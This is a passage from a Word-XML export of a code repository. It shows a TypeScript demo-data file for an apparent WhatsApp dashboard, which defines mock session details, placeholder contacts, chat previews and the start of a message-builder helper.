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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REPO: wa — part-15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Generated: 2026-04-11T16:50:29.996Z</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apps/dashboard-neo/src/lib/demo/demo-data.ts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Demo Data Factory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Provides realistic mock data for the entire dashboard when ?demo=true.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * All data is static/deterministic — no randomness on each render.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Helpers ─────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const now = Date.now()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const ago = (mins: number) =&gt; now - mins * 60_000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const tsAgo = (mins: number) =&gt; Math.floor(ago(mins)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Session ─────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const demoSession = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  connected: true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  hostNumber: "+1 (234) 567-8901",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  waVersion: "2.2506.12",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  battery: 87,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  connectionState: "CONNECTED",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  uptime: 14523,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Contacts ────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const demoContacts = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678901@c.us", name: "Alice Johnson", pushname: "Alice", shortName: "Alice", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Alice Johnson", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678902@c.us", name: "Bob Martinez", pushname: "Bobby", shortName: "Bob", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Bob Martinez", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678903@c.us", name: "Carol Wei", pushname: "Carol", shortName: "Carol", isBusiness: true, isMyContact: true, isWAContact: true, formattedName: "Carol Wei", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678904@c.us", name: "David Okonkwo", pushname: "Dave", shortName: "Dave", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "David Okonkwo", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678905@c.us", name: "Elena Petrova", pushname: "Elena", shortName: "Elena", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Elena Petrova", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678906@c.us", name: "Fatima Al-Rashid", pushname: "Fatima", shortName: "Fatima", isBusiness: true, isMyContact: true, isWAContact: true, formattedName: "Fatima Al-Rashid", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678907@c.us", name: "George Kim", pushname: "George", shortName: "George", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "George Kim", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678908@c.us", name: "Hannah Schmidt", pushname: "Hannah", shortName: "Hannah", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Hannah Schmidt", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678909@c.us", name: "Ibrahim Diallo", pushname: "Ibrahim", shortName: "Ibrahim", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Ibrahim Diallo", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678910@c.us", name: "Julia Santos", pushname: "Julia", shortName: "Julia", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Julia Santos", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678911@c.us", name: "Karim Nasser", pushname: "Karim", shortName: "Karim", isBusiness: true, isMyContact: true, isWAContact: true, formattedName: "Karim Nasser", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678912@c.us", name: "Lisa Andersson", pushname: "Lisa", shortName: "Lisa", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Lisa Andersson", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678913@c.us", name: "Mohammed Aref", pushname: "Mo", shortName: "Mo", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Mohammed Aref", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678914@c.us", name: "Nina Tanaka", pushname: "Nina", shortName: "Nina", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Nina Tanaka", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678915@c.us", name: "Oscar Reyes", pushname: "Oscar", shortName: "Oscar", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Oscar Reyes", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678916@c.us", name: "Priya Sharma", pushname: "Priya", shortName: "Priya", isBusiness: true, isMyContact: true, isWAContact: true, formattedName: "Priya Sharma", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678917@c.us", name: "Rami Khalil", pushname: "Rami", shortName: "Rami", isBusiness: false, isMyContact: false, isWAContact: true, formattedName: "Rami Khalil", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678918@c.us", name: "Sophie Laurent", pushname: "Sophie", shortName: "Sophie", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Sophie Laurent", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678919@c.us", name: "Tariq bin Salman", pushname: "Tariq", shortName: "Tariq", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Tariq bin Salman", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678920@c.us", name: "Uma Patel", pushname: "Uma", shortName: "Uma", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Uma Patel", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678921@c.us", name: "Viktor Ivanov", pushname: "Vik", shortName: "Vik", isBusiness: false, isMyContact: false, isWAContact: true, formattedName: "Viktor Ivanov", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678922@c.us", name: "Wendy O'Brien", pushname: "Wendy", shortName: "Wendy", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Wendy O'Brien", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678923@c.us", name: "Xia Chen", pushname: "Xia", shortName: "Xia", isBusiness: true, isMyContact: true, isWAContact: true, formattedName: "Xia Chen", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678924@c.us", name: "Youssef Mansour", pushname: "Youssef", shortName: "Youssef", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Youssef Mansour", type: "in" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678925@c.us", name: "Zara Williams", pushname: "Zara", shortName: "Zara", isBusiness: false, isMyContact: true, isWAContact: true, formattedName: "Zara Williams", type: "in"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Chats ───────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export const demoChats = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678901@c.us", name: "Alice Johnson", isGroup: false, unreadCount: 3, t: tsAgo(2), lastMessage: { body: "Hey, are you coming to the meeting?", timestamp: tsAgo(2) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678902@c.us", name: "Bob Martinez", isGroup: false, unreadCount: 0, t: tsAgo(15), lastMessage: { body: "Got it, thanks!", timestamp: tsAgo(15) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "120363001234567890@g.us", name: "🚀 open-wa Dev Team", isGroup: true, unreadCount: 12, t: tsAgo(1), lastMessage: { body: "The new build is passing!", timestamp: tsAgo(1) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678903@c.us", name: "Carol Wei", isGroup: false, unreadCount: 0, t: tsAgo(45), lastMessage: { body: "Invoice attached 📎", timestamp: tsAgo(45) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "120363009876543210@g.us", name: "📊 Analytics Team", isGroup: true, unreadCount: 5, t: tsAgo(8), lastMessage: { body: "Q1 report is ready for review", timestamp: tsAgo(8) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678904@c.us", name: "David Okonkwo", isGroup: false, unreadCount: 1, t: tsAgo(30), lastMessage: { body: "Can you send the API docs link?", timestamp: tsAgo(30) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678905@c.us", name: "Elena Petrova", isGroup: false, unreadCount: 0, t: tsAgo(120), lastMessage: { body: "See you tomorrow! 👋", timestamp: tsAgo(120) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "120363005555555555@g.us", name: "🏠 Family Group", isGroup: true, unreadCount: 0, t: tsAgo(60), lastMessage: { body: "Dinner at 7pm?", timestamp: tsAgo(60) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678906@c.us", name: "Fatima Al-Rashid", isGroup: false, unreadCount: 2, t: tsAgo(5), lastMessage: { body: "The new pricing looks good", timestamp: tsAgo(5) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678907@c.us", name: "George Kim", isGroup: false, unreadCount: 0, t: tsAgo(180), lastMessage: { body: "Happy birthday! 🎂", timestamp: tsAgo(180) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "120363002222222222@g.us", name: "⚽ Weekend Football", isGroup: true, unreadCount: 8, t: tsAgo(3), lastMessage: { body: "Game is at 3pm Saturday", timestamp: tsAgo(3) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678908@c.us", name: "Hannah Schmidt", isGroup: false, unreadCount: 0, t: tsAgo(240), lastMessage: { body: "Forwarded a contact", timestamp: tsAgo(240) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678909@c.us", name: "Ibrahim Diallo", isGroup: false, unreadCount: 0, t: tsAgo(360), lastMessage: { body: "📍 Location shared", timestamp: tsAgo(360) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "120363003333333333@g.us", name: "🛠 Bug Reports", isGroup: true, unreadCount: 3, t: tsAgo(10), lastMessage: { body: "Issue #42 is fixed in main", timestamp: tsAgo(10) } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  { id: "12345678910@c.us", name: "Julia Santos", isGroup: false, unreadCount: 0, t: tsAgo(480), lastMessage: { body: "That's hilarious 😂", timestamp: tsAgo(480)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Messages (per-chat) ─────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const makeMsgs = (chatId: string, msgs: Array&lt;{body: string; fromMe: boolean; type?: string; mins: number}&gt;)  =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  msgs.map((m, i) =&gt; ({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    id: `msg_${chatId}_${i}`,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    body: m.body,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    type: m.type || "chat",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    fromMe: m.fromMe,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    timestamp: tsAgo(m.mins),</w:t>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isGroupMsg: chatId.includes("@g.us"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    isMedia: ["image", "video", "audio", "document", "ptt"].includes(m.type || ""),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    isNotification: false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    isQuotedMsgAvailable: false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    from: m.fromMe ? "me" : chatId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    to: m.fromMe ? chatId : "me",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    self: m.fromMe ? "out" as const : "in" as const,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ack: m.fromMe ? 3 : -1,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
